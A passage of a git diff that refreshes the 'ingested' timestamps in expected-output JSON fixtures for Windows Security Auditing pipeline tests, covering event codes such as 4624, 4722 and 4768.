"name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:17.906691Z", + "ingested": "2021-12-09T13:45:48.720114100Z", "code": "4752", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json index a8708a15310..295846351c0 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:05.514297184Z", + "ingested": "2021-12-09T13:45:48.972013Z", "code": "4753", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json index 0d5a5129521..18dece12a65 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:05.603328858Z", + "ingested": "2021-12-09T13:45:49.162535600Z", "code": "4759", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json index 3f1539563b2..60497ade63b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4760.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:05.696609273Z", + "ingested": "2021-12-09T13:45:49.356213Z", "code": "4760", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json index ffeefc7e13d..1c4f746a96e 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4761.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:18.871413700Z", + "ingested": "2021-12-09T13:45:49.561917300Z", "code": "4761", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json index c89878956f6..f8891896198 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4762.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:19.143941900Z", + "ingested": "2021-12-09T13:45:49.822688Z", "code": "4762", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json index 85eb75204b3..1adcefc4726 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4763.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:06.011624475Z", + "ingested": "2021-12-09T13:45:50.082779300Z", "code": "4763", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json index 9e77961ce6a..68ec14da47f 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4817-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:06.112340859Z", + "ingested": "2021-12-09T13:45:50.270227300Z", "code": "4817", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json index 9f0ed30d088..b170f36ffed 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4902-windowssrv2016.json-expected.json @@ -47,7 +47,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:06.211058573Z", + "ingested": "2021-12-09T13:45:50.449397500Z", "code": "4902", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json index 5a8596a512c..270cb476576 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4904-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:06.298461393Z", + "ingested": "2021-12-09T13:45:50.573813200Z", "code": "4904", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json index 4f7bb34466c..cb85f92ff19 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4905-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:06.399764322Z", + "ingested": "2021-12-09T13:45:50.772922Z", "code": "4905", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json index 99797402671..965c931df7c 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4906-windowssrv2016.json-expected.json @@ -46,7 +46,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:06.484704505Z", + "ingested": "2021-12-09T13:45:50.972826900Z", "code": "4906", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json index a3947ad8eca..39289698950 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4907-windowssrv2016.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-07-30T21:06:06.556720769Z", + "ingested": "2021-12-09T13:45:51.090769700Z", "code": "4907", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json index ee2ad9bc4d3..cc400c86fe1 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json @@ -67,7 +67,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:06.646748482Z", + "ingested": "2021-12-09T13:45:51.283482500Z", "code": "4673", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json index 5e786130bb3..2df6677e8d6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:06.724198887Z", + "ingested": "2021-12-09T13:45:51.472412500Z", "code": "4697", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json index 5ded5e448a0..9f0d8dc52ac 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json @@ -77,7 +77,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:21.246497500Z", + "ingested": "2021-12-09T13:45:51.665278200Z", "code": "4768", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json index fb250fd3745..f7cfee07f33 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json @@ -76,7 +76,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:06.934995191Z", + "ingested": "2021-12-09T13:45:51.894330100Z", "code": "4769", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json index 41e6edbad5d..25f40fe47fd 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json @@ -71,7 +71,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:07.047425653Z", + "ingested": "2021-12-09T13:45:52.108288400Z", "code": "4770", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json index 6ad77df55d1..a9bd7c27946 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4771.json-expected.json @@ -73,7 +73,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-10-19T11:55:22.001023400Z", + "ingested": "2021-12-09T13:45:52.303560800Z", "code": "4771", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json index 74a62480bd1..d77ad8dd952 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4776.json-expected.json @@ -59,7 +59,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:07.275786966Z", + "ingested": "2021-12-09T13:45:52.499134700Z", "code": "4776", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json index c14a0668c8e..1debe07b396 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4778.json-expected.json @@ -66,7 +66,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:07.375037127Z", + "ingested": "2021-12-09T13:45:52.652424900Z", "code": "4778", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json index ab5839fcf72..9ca3a755534 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012-4779.json-expected.json @@ -66,7 +66,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-07-30T21:06:07.475421027Z", + "ingested": "2021-12-09T13:45:52.832864500Z", "code": "4779", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json index 4c32bf66d91..587d54b2f61 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2012r2-logon.json-expected.json @@ -79,7 +79,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557027317Z", + "ingested": "2021-12-09T13:45:53.021187300Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -177,7 +177,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557029717Z", + "ingested": "2021-12-09T13:45:53.021197900Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -281,7 +281,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557030314Z", + "ingested": "2021-12-09T13:45:53.021202700Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -379,7 +379,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557030851Z", + "ingested": "2021-12-09T13:45:53.021209700Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -476,7 +476,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557031388Z", + "ingested": "2021-12-09T13:45:53.021216800Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -573,7 +573,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557031880Z", + "ingested": "2021-12-09T13:45:53.021221100Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -670,7 +670,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557032362Z", + "ingested": "2021-12-09T13:45:53.021226100Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -767,7 +767,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557032857Z", + "ingested": "2021-12-09T13:45:53.021232300Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -867,7 +867,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557033352Z", + "ingested": "2021-12-09T13:45:53.021237Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -965,7 +965,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557033830Z", + "ingested": "2021-12-09T13:45:53.021241700Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1069,7 +1069,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557034321Z", + "ingested": "2021-12-09T13:45:53.021256600Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1167,7 +1167,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557035008Z", + "ingested": "2021-12-09T13:45:53.021263700Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1265,7 +1265,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557035592Z", + "ingested": "2021-12-09T13:45:53.021268500Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1363,7 +1363,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557036089Z", + "ingested": "2021-12-09T13:45:53.021273500Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1461,7 +1461,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557036568Z", + "ingested": "2021-12-09T13:45:53.021278700Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1559,7 +1559,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557037042Z", + "ingested": "2021-12-09T13:45:53.021284800Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1657,7 +1657,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557037642Z", + "ingested": "2021-12-09T13:45:53.021288700Z", "code": "4624", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -1764,7 +1764,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-07-30T21:06:07.557038126Z", + "ingested": "2021-12-09T13:45:53.021294600Z", "code": "4625", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json index 6a6e2b63138..c123e615d29 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4722-account-enabled.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:27.016591Z", + "ingested": "2021-12-09T13:45:56.799158900Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:27.016600700Z", + "ingested": "2021-12-09T13:45:56.799168200Z", "code": "4722", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json index 547487c3a26..164fe82a6de 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4723-password-change.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:27.450128800Z", + "ingested": "2021-12-09T13:45:57.198644900Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:27.450137Z", + "ingested": "2021-12-09T13:45:57.198653Z", "code": "4723", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json index 5078f6c3a20..b7f1cf2b80f 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4724-password-reset.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:27.912761300Z", + "ingested": "2021-12-09T13:45:57.605360600Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:27.912770100Z", + "ingested": "2021-12-09T13:45:57.605370200Z", "code": "4724", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json index df4a98ae603..c26ffa0750d 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4725-account-disabled.json-expected.json @@ -62,7 +62,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:28.349650400Z", + "ingested": "2021-12-09T13:45:58.018706300Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -149,7 +149,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:28.349659100Z", + "ingested": "2021-12-09T13:45:58.018715100Z", "code": "4725", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json index aa0d1f55a04..bdab733d2f2 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4726-account-deleted.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:28.808472500Z", + "ingested": "2021-12-09T13:45:58.420324500Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", @@ -151,7 +151,7 @@ "name": "WIN-41OB2LO92CR" }, "event": { - "ingested": "2021-10-19T11:55:28.808476700Z", + "ingested": "2021-12-09T13:45:58.420333100Z", "code": "4726", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json index 66ae340e1d8..92adf9049a7 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4727.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:10.379171485Z", + "ingested": "2021-12-09T13:45:58.829765Z", "code": "4727", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json index 35a41c63fe4..29d7429c1ef 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4728.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-10-19T11:55:29.482838600Z", + "ingested": "2021-12-09T13:45:59.028797700Z", "code": "4728", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json index aa28440ea04..4e789547880 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4729.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-10-19T11:55:29.782306700Z", + "ingested": "2021-12-09T13:45:59.290038500Z", "code": "4729", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json index 0dc0f2df366..086659daf0f 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4730.json-expected.json @@ -61,7 +61,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:10.708586706Z", + "ingested": "2021-12-09T13:45:59.545413300Z", "code": "4730", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json index b8970540c34..285251fdbc5 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4731.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:10.823906963Z", + "ingested": "2021-12-09T13:45:59.740385600Z", "code": "4731", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json index a77ae6e8509..afd3ede3ac9 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4732.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-10-19T11:55:30.491308800Z", + "ingested": "2021-12-09T13:45:59.938327700Z", "code": "4732", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json index c0fd8104160..bd3c9c7ce45 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4733.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-10-19T11:55:30.760815900Z", + "ingested": "2021-12-09T13:46:00.202622100Z", "code": "4733", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json index a9ced611542..c17617e0863 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4734.json-expected.json @@ -61,7 +61,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:11.152463009Z", + "ingested": "2021-12-09T13:46:00.463978200Z", "code": "4734", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json index 597b2854c1a..dd81014c585 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-security-windows2016-4735.json-expected.json @@ -63,7 +63,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-07-30T21:06:11.247659690Z", + "ingested": "2021-12-09T13:46:00.656014200Z", "code": "4735", "provider": "Microsoft-Windows-Security-Auditing", 